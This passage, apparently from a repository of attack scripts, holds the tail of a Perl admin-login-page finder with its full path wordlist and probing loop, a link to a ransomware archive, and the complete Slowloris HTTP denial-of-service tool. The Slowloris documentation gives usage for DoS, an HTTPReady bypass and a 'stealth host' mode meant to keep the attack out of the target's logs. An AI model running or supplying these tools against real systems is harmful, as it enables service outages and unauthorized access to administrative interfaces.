','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/','adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/','bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php','bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp','cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/','fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/','login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/','modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php','moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php','myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/','panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php','pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login.php','rcLogin/','Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php','smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/','ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/','webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php','wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp' 257 | ); 258 | 259 | foreach $ways(@path1){ 260 | 261 | $final=$site.$ways; 262 | 263 | my $req=HTTP::Request->new(GET=>$final); 264 | my $ua=LWP::UserAgent->new(); 265 | $ua->timeout(30); 266 | my $response=$ua->request($req); 267 | 268 | if($response->content =~ /Username/ || 269 | $response->content =~ /Password/ || 270 | $response->content =~ /username/ || 271 | $response->content =~ /password/ || 272 | $response->content =~ /USERNAME/ || 273 | $response->content =~ /PASSWORD/ || 274 | $response->content =~ /Senha/ || 275 | $response->content =~ /senha/ || 276 | $response->content =~ /Personal/ || 277 | $response->content =~ /Usuario/ || 278 | $response->content =~ /Clave/ || 279 | $response->content =~ /Usager/ || 280 | $response->content =~ /usager/ || 281 | $response->content =~ /Sing/ || 282 | $response->content =~ /passe/ || 283 | $response->content =~ /P\/W/ || 284 | $response->content =~ /Admin Password/ 285 | ){ 286 | print " \n [+] Found -> $final\n\n"; 287 | print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; 288 | }else{ 289 | print "[-] Not Found <- $final\n"; 290 | } 291 | } 292 | kill("STOP",NULL); 293 | } 294 | 295 | ## -------------------------------------------------------------------------------- /ransomware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sup3r-Us3r/scripts/292290b4e86a2e90ac643912aad2b516f4ea974b/ransomware.zip -------------------------------------------------------------------------------- /slowloris.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | use strict; 3 | use IO::Socket::INET; 4 | use IO::Socket::SSL; 5 | use Getopt::Long; 6 | use Config; 7 | 8 | $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors 9 | 10 | print < \$shost, 45 | 'dns=s' => \$host, 46 | 'httpready' => \$httpready, 47 | 'num=i' => \$connections, 48 | 'cache' => \$cache, 49 | 'port=i' => \$port, 50 | 'https' => \$ssl, 51 | 'tcpto=i' => \$tcpto, 52 | 'test' => \$test, 53 | 'timeout=i' => \$timeout, 54 | 'version' => \$version, 55 | ); 56 | 57 | if ($version) { 58 | print "Version 0.7\n"; 59 | exit; 60 | } 61 | 62 | unless ($host) { 63 | print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; 64 | print "\n\tType 'perldoc $0' for help with options.\n\n"; 65 | exit; 66 | } 67 | 68 | unless ($port) { 69 | $port = 80; 70 | print "Defaulting to port 80.\n"; 71 | } 72 | 73 | unless ($tcpto) { 74 | $tcpto = 5; 75 | print "Defaulting to a 5 second tcp connection timeout.\n"; 76 | } 77 | 78 | unless ($test) { 79 | unless ($timeout) { 80 | $timeout = 100; 81 | print "Defaulting to a 100 second re-try timeout.\n"; 82 | } 83 | unless ($connections) { 84 | $connections = 1000; 85 | print "Defaulting to 1000 connections.\n"; 86 | } 87 | } 88 | 89 | my $usemultithreading = 0; 90 | if ( $Config{usethreads} ) { 91 | print "Multithreading enabled.\n"; 92 | $usemultithreading = 1; 93 | use threads; 94 | use threads::shared; 95 | } 96 | else { 97 | print "No multithreading capabilites found!\n"; 98 | print "Slowloris will be slower than normal as a result.\n"; 99 | } 100 | 101 | my $packetcount : shared = 0; 102 | my $failed : shared = 0; 103 | my $connectioncount : shared = 0; 104 | 105 | srand() if ($cache); 106 | 107 | if ($shost) { 108 | $sendhost = $shost; 109 | } 110 | else { 111 | $sendhost = $host; 112 | } 113 | if ($httpready) { 114 | $method = "POST"; 115 | } 116 | else { 117 | $method = "GET"; 118 | } 119 | 120 | if ($test) { 121 | my @times = ( "2", "30", "90", "240", "500" ); 122 | my $totaltime = 0; 123 | foreach (@times) { 124 | $totaltime = $totaltime + $_; 125 | } 126 | $totaltime = $totaltime / 60; 127 | print "This test could take up to $totaltime minutes.\n"; 128 | 129 | my $delay = 0; 130 | my $working = 0; 131 | my $sock; 132 | 133 | if ($ssl) { 134 | if ( 135 | $sock = new IO::Socket::SSL( 136 | PeerAddr => "$host", 137 | PeerPort => "$port", 138 | Timeout => "$tcpto", 139 | Proto => "tcp", 140 | ) 141 | ) 142 | { 143 | $working = 1; 144 | } 145 | } 146 | else { 147 | if ( 148 | $sock = new IO::Socket::INET( 149 | PeerAddr => "$host", 150 | PeerPort => "$port", 151 | Timeout => "$tcpto", 152 | Proto => "tcp", 153 | ) 154 | ) 155 | { 156 | $working = 1; 157 | } 158 | } 159 | if ($working) { 160 | if ($cache) { 161 | $rand = "?" . int( rand(99999999999999) ); 162 | } 163 | else { 164 | $rand = ""; 165 | } 166 | my $primarypayload = 167 | "GET /$rand HTTP/1.1\r\n" 168 | . "Host: $sendhost\r\n" 169 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 170 | . "Content-Length: 42\r\n"; 171 | if ( print $sock $primarypayload ) { 172 | print "Connection successful, now comes the waiting game...\n"; 173 | } 174 | else { 175 | print 176 | "That's odd - I connected but couldn't send the data to $host:$port.\n"; 177 | print "Is something wrong?\nDying.\n"; 178 | exit; 179 | } 180 | } 181 | else { 182 | print "Uhm... I can't connect to $host:$port.\n"; 183 | print "Is something wrong?\nDying.\n"; 184 | exit; 185 | } 186 | for ( my $i = 0 ; $i <= $#times ; $i++ ) { 187 | print "Trying a $times[$i] second delay: \n"; 188 | sleep( $times[$i] ); 189 | if ( print $sock "X-a: b\r\n" ) { 190 | print "\tWorked.\n"; 191 | $delay = $times[$i]; 192 | } 193 | else { 194 | if ( $SIG{__WARN__} ) { 195 | $delay = $times[ $i - 1 ]; 196 | last; 197 | } 198 | print "\tFailed after $times[$i] seconds.\n"; 199 | } 200 | } 201 | 202 | if ( print $sock "Connection: Close\r\n\r\n" ) { 203 | print "Okay that's enough time. Slowloris closed the socket.\n"; 204 | print "Use $delay seconds for -timeout.\n"; 205 | exit; 206 | } 207 | else { 208 | print "Remote server closed socket.\n"; 209 | print "Use $delay seconds for -timeout.\n"; 210 | exit; 211 | } 212 | if ( $delay < 166 ) { 213 | print < "$host", 249 | PeerPort => "$port", 250 | Timeout => "$tcpto", 251 | Proto => "tcp", 252 | ) 253 | ) 254 | { 255 | $working[$z] = 1; 256 | } 257 | else { 258 | $working[$z] = 0; 259 | } 260 | } 261 | else { 262 | if ( 263 | $sock[$z] = new IO::Socket::INET( 264 | PeerAddr => "$host", 265 | PeerPort => "$port", 266 | Timeout => "$tcpto", 267 | Proto => "tcp", 268 | ) 269 | ) 270 | { 271 | $working[$z] = 1; 272 | $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK 273 | } 274 | else { 275 | $working[$z] = 0; 276 | } 277 | } 278 | if ( $working[$z] == 1 ) { 279 | if ($cache) { 280 | $rand = "?" . int( rand(99999999999999) ); 281 | } 282 | else { 283 | $rand = ""; 284 | } 285 | my $primarypayload = 286 | "$method /$rand HTTP/1.1\r\n" 287 | . "Host: $sendhost\r\n" 288 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 289 | . "Content-Length: 42\r\n"; 290 | my $handle = $sock[$z]; 291 | if ($handle) { 292 | print $handle "$primarypayload"; 293 | if ( $SIG{__WARN__} ) { 294 | $working[$z] = 0; 295 | close $handle; 296 | $failed++; 297 | $failedconnections++; 298 | } 299 | else { 300 | $packetcount++; 301 | $working[$z] = 1; 302 | } 303 | } 304 | else { 305 | $working[$z] = 0; 306 | $failed++; 307 | $failedconnections++; 308 | } 309 | } 310 | else { 311 | $working[$z] = 0; 312 | $failed++; 313 | $failedconnections++; 314 | } 315 | } 316 | } 317 | print "\t\tSending data.\n"; 318 | foreach my $z ( 1 .. $num ) { 319 | if ( $working[$z] == 1 ) { 320 | if ( $sock[$z] ) { 321 | my $handle = $sock[$z]; 322 | if ( print $handle "X-a: b\r\n" ) { 323 | $working[$z] = 1; 324 | $packetcount++; 325 | } 326 | else { 327 | $working[$z] = 0; 328 | #debugging info 329 | $failed++; 330 | $failedconnections++; 331 | } 332 | } 333 | else { 334 | $working[$z] = 0; 335 | #debugging info 336 | $failed++; 337 | $failedconnections++; 338 | } 339 | } 340 | } 341 | print 342 | "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; 343 | sleep($timeout); 344 | } 345 | } 346 | 347 | sub domultithreading { 348 | my ($num) = @_; 349 | my @thrs; 350 | my $i = 0; 351 | my $connectionsperthread = 50; 352 | while ( $i < $num ) { 353 | $thrs[$i] = 354 | threads->create( \&doconnections, $connectionsperthread, 1 ); 355 | $i += $connectionsperthread; 356 | } 357 | my @threadslist = threads->list(); 358 | while ( $#threadslist > 0 ) { 359 | $failed = 0; 360 | } 361 | } 362 | 363 | __END__ 364 | 365 | =head1 TITLE 366 | 367 | Slowloris 368 | 369 | =head1 VERSION 370 | 371 | Version 0.7 Beta 372 | 373 | =head1 DATE 374 | 375 | 06/17/2009 376 | 377 | =head1 AUTHOR 378 | 379 | RSnake with threading from John Kinsella 380 | 381 | =head1 ABSTRACT 382 | 383 | Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. 384 | 385 | =head1 AFFECTS 386 | 387 | Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? 388 | 389 | =head1 NOT AFFECTED 390 | 391 | IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...? 392 | 393 | =head1 DESCRIPTION 394 | 395 | Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. 396 | 397 | As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. 398 | 399 | =head2 Testing 400 | 401 | If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: 402 | 403 | =head3 Testing Example: 404 | 405 | ./slowloris.pl -dns www.example.com -port 80 -test 406 | 407 | This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). 408 | 409 | =head2 HTTP DoS 410 | 411 | Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. 412 | 413 | =head3 HTTP DoS Example: 414 | 415 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 416 | 417 | =head2 HTTPReady Bypass 418 | 419 | HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. 420 | 421 | =head3 HTTPReady Bypass Example 422 | 423 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready 424 | 425 | =head2 Stealth Host DoS 426 | 427 | If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. 428 | 429 | =head3 Stealth Host DoS Example: 430 | 431 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com 432 | 433 | =head2 HTTPS DoS 434 | 435 | Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. 436 | 437 | =head3 HTTPS DoS Example: 438 | 439 | ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https 440 | 441 | =head2 HTTP Cache 442 | 443 | Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. 444 | 445 | =head3 HTTP Cache Example: 446 | 447 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache 448 | 449 | =head1 Issues 450 | 451 | Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. 452 | 453 | Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. 454 | 455 | For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. 456 | 457 | Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. 458 | 459 | =head1 What is a slow loris? 460 | 461 | What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: 462 | 463 | http://www.youtube.com/watch?v=rLdQ3UhLoD4 464 | --------------------------------------------------------------------------------